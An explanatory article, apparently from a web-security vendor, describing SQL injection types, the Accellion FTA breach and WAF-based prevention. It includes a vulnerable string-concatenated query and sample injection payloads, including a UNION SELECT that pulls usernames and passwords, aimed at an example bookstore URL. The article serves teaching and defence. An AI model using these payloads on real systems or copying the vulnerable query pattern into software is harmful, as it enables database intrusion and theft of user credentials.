What is SQL Injection?
SQL injection, or SQLI, is a well-known attack method that employs malicious SQL code to manipulate backend databases and access unintended information. This data could encompass various items, including sensitive company data, user lists, or private customer details.
The consequences of SQL injection on a business are significant. A successful attack could lead to unauthorized access to user lists, deletion of entire tables, and, in some cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLi attack, it’s essential to consider the loss of customer trust if personal information such as phone numbers, addresses, and credit card details are compromised.
Although SQL injection can target any SQL database, websites are the most common targets for such attacks.
What are SQL queries
SQL is a standardized language used for interacting with and managing databases, enabling the creation of tailored data views for individual users. Through SQL queries, various commands like data retrieval, updates, and record deletions can be executed. Different SQL components are employed to fulfill specific tasks; for instance, queries may utilize the SELECT statement to retrieve data based on user-defined parameters.
Consider an example query from a typical online bookstore’s SQL database:
SELECT BookTitle, Author FROM Books WHERE ISBN = ISBN
Here, the web application constructs a dynamic query string sent to the database as a single SQL statement:
sql_query = " SELECT BookTitle, Author FROM Books WHERE ISBN = " & Request.QueryString("ISBN")
Now, imagine a user provides input via a URL like http://www.bookstore.com/books/details.asp?isbn=123456. This input generates the following SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = 123456
As illustrated by the syntax, this query retrieves the title and author of the book with ISBN 123456.
Types of SQL Injections
SQL injections are generally categorized into three types: In-band SQLi (Classic), Inferential SQLi (Blind), and Out-of-band SQLi. The classification of SQL injection types is determined by the techniques they employ to access backend data and the extent of damage they can cause.
In-band SQLi
The attacker uses the same communication channel both to launch their attacks and to collect results. In-band SQLi, due to its simplicity and effectiveness, stands as one of the most prevalent types of SQLi attack. This method comprises two sub-variations:
- Error-based SQLi: Here, the attacker executes actions that prompt the database to generate error messages. These error messages may potentially provide the attacker with information regarding the database structure.
- Union-based SQLi: This technique exploits the UNION SQL operator, which combines multiple select statements generated by the database to produce a single HTTP response. This response may contain data that the attacker can exploit.
Inferential (Blind) SQLi
The attacker transmits data payloads to the server and observes its response and behavior to glean insights into its structure. This approach is termed blind SQLi because data isn’t directly transferred from the website database to the attacker, thus preventing them from viewing information about the attack in-band.
Blind SQL injections hinge on analyzing the response and behavior patterns of the server, hence they tend to be slower to execute but can be equally damaging. Blind SQL injections can be categorized as follows:
- Boolean: In this method, the attacker sends a SQL query to the database, prompting the application to return a result. The outcome varies based on whether the query is true or false. Depending on this outcome, the information within the HTTP response will either change or remain unchanged. By analyzing these responses, the attacker can deduce whether the query produced a true or false result.
- Time-based: Here, the attacker sends a SQL query to the database, inducing it to pause (for a specified duration in seconds) before responding. By observing the time it takes for the database to respond, the attacker can ascertain whether the query is true or false. The HTTP response is generated either instantly or after the designated waiting period, allowing the attacker to determine the veracity of the query without relying on direct data from the database.
Out-of-band SQLi
This type of attack is feasible only when specific functionalities are activated on the database server employed by the web application. It serves as an alternative to in-band and inferential SQL injection techniques.
Out-of-band SQL injection occurs when the attacker cannot utilize the same communication channel for both launching the attack and retrieving information, or when the server’s speed or stability precludes such actions. These methods rely on the server’s ability to generate DNS or HTTP requests to transmit data to the attacker.
SQL injection example
To illustrate SQL injection, let’s consider an online bookstore’s website. An attacker seeks to exploit vulnerabilities in the website’s input validation to manipulate SQL queries. Here are a few methods they might employ:
1. Boolean-based SQLi:
The attacker modifies the input URL to retrieve all book titles and authors from the database:
Input URL: http://www.bookstore.com/books/details.asp?isbn=123456‘ OR ‘1’=’1
Resulting SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = '123456' OR '1'='1'
2. Error-based SQLi:
The attacker induces an error message to extract information about the database structure:
Input URL: http://www.bookstore.com/books/details.asp?isbn=123456′ AND 1=convert(int, (select top 1 column_name from information_schema.columns))
Resulting SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = '123456' AND 1=convert(int, (select top 1 column_name from information_schema.columns))
By observing error messages returned by the database, the attacker gains insights into its structure.
3. UNION-based SQLi:
The attacker employs a UNION SELECT statement to combine book details with sensitive user information:
Input URL: http://www.bookstore.com/books/details.asp?isbn=123456 UNION SELECT username, password FROM Users
Resulting SQL query:
SELECT BookTitle, Author FROM Books WHERE ISBN = '123456' UNION SELECT username, password FROM Users
SQL injection combined with OS Command Execution: The Accellion Attack
Accellion, the creator of the File Transfer Appliance (FTA), a network device widely utilized in organizations globally for transferring large, sensitive files, has reached the end of its life cycle after over 20 years in service.
Recently, FTA became the target of a distinctive and highly sophisticated attack, combining SQL injection with operating system command execution. Experts believe that the perpetrators behind the Accellion attack may have affiliations with the financial crimes group FIN11 and the ransomware group Clop.
This incident underscores that SQL injection isn’t solely limited to attacking web applications or services but can also be employed to compromise backend systems and illicitly extract data.
Accelion Attack flow
According to a report commissioned by Accellion, the SQL injection and command execution attack unfolded as follows:
- Attackers utilized SQL Injection to access document_root.html and retrieved encryption keys from the Accellion FTA database.
- With these keys, attackers generated valid tokens to access additional files.
- Exploiting an operating system command execution vulnerability in the sftp_account_edit.php file, attackers executed their own commands.
- A web shell was created in the server path /home/seos/courier/oauth.api by the attackers.
- Through this web shell, a custom, full-featured web shell named DEWMODE was uploaded to disk, equipped with specialized tools for data exfiltration from the Accellion system.
- Using DEWMODE, attackers extracted a list of available files from a MySQL database on the Accellion FTA system and presented files along with their metadata on an HTML page.
- The attackers initiated file download requests, incorporating encrypted and encoded URL parameters, directed to the DEWMODE component.
- DEWMODE processed these requests and subsequently removed them from the FTA web logs.
This incident highlights the severity of SQL injection attacks by demonstrating how they can serve as a gateway for more damaging assaults on critical corporate infrastructure.
SQLI prevention and mitigation
To prevent SQL injection (SQLI) attacks and mitigate their impact, several effective measures can be implemented.
Input validation, also known as sanitization, serves as the initial line of defense. It involves coding practices designed to identify and filter out illegitimate user inputs. While input validation is considered a best practice, it’s not infallible. Mapping out all legal and illegal inputs can be challenging and may lead to numerous false positives, disrupting user experience and application functionality.
Therefore, many organizations employ a web application firewall (WAF) to bolster their defenses against SQLI and other online threats. A WAF utilizes a vast and continuously updated database of meticulously crafted signatures to identify and block malicious SQL queries. These signatures target specific attack vectors and are regularly updated to address newly discovered vulnerabilities.
Furthermore, modern WAFs are often integrated with other security solutions to enhance their effectiveness. For instance, a WAF may cross-verify suspicious inputs with IP data to make informed blocking decisions. It may block an input only if the associated IP has a history of malicious activity.
Cloud-based WAF employs signature recognition, IP reputation analysis, and other security methodologies to detect and prevent SQL injections with minimal false positives. Additionally, it utilizes IncapRules, a custom security rule engine that enables precise customization of default security settings and the creation of tailored security policies to address specific cases.
FAQ’s
What is SQL injection (SQLI), and how does it work?
SQL injection, commonly referred to as SQLI, is an attack method where malicious SQL code is used to manipulate backend databases and gain unauthorized access to sensitive information. Attackers exploit vulnerabilities in web applications that allow them to input malicious SQL code, enabling them to retrieve, modify, or delete data from the database.
What are the consequences of SQL injection attacks?
SQL injection attacks can have severe consequences for businesses, including unauthorized access to sensitive data such as user lists and private customer details, deletion of entire database tables, and in some cases, the attacker gaining administrative control over the database.
How can businesses prevent SQL injection attacks?
One effective method to prevent SQL injection attacks is through input validation, also known as sanitization, which involves filtering and validating user inputs to ensure they are safe and legitimate. Additionally, businesses can deploy web application firewalls (WAFs) to filter out malicious SQL queries and other online threats. Modern WAFs use a combination of signature recognition, IP reputation analysis, and other security methodologies to detect and prevent SQL injection attacks with minimal false positives.
Are SQL injection attacks limited to web applications only?
No, SQL injection attacks can also target backend systems and databases, not just web applications. Attackers can exploit vulnerabilities in the database management system to execute SQL injection attacks and exfiltrate data.
What are some common types of SQL injection attacks?
SQL injection attacks can be categorized into three main types: In-band SQLi (Classic), Inferential SQLi (Blind), and Out-of-band SQLi. Each type employs different techniques to access backend data and can cause varying degrees of damage.
How does the Accellion attack demonstrate the severity of SQL injection attacks?
The Accellion attack combined SQL injection with operating system command execution, highlighting the potential for SQL injection attacks to compromise critical corporate infrastructure. This incident underscores the importance of implementing robust security measures to prevent and mitigate SQL injection attacks.
What steps can businesses take to mitigate the impact of SQL injection attacks?
In addition to input validation and deploying web application firewalls, businesses can implement regular security updates and patches, conduct security audits and penetration testing, and educate employees about the risks of SQL injection attacks and best practices for prevention.
How does Imperva’s cloud-based WAF prevent SQL injection attacks with minimal false positives?
Imperva’s cloud-based WAF employs signature recognition, IP reputation analysis, and other security methodologies to detect and prevent SQL injections. Additionally, it utilizes IncapRules, a custom security rule engine that enables precise customization of default security settings and the creation of tailored security policies to address specific cases, thus minimizing false positives and enhancing overall security posture.
Conclusion
SQL injection (SQLI) attacks pose serious threats to businesses, exploiting vulnerabilities in web applications and databases. To combat these risks, organizations must employ robust security measures like input validation and web application firewalls (WAFs). These defenses, alongside regular updates, audits, and employee education, form a comprehensive strategy to mitigate the impact of SQL injection attacks and protect critical infrastructure and sensitive data. By prioritizing security measures, businesses can defend against SQLI attacks and safeguard their operations effectively.
Comments are closed.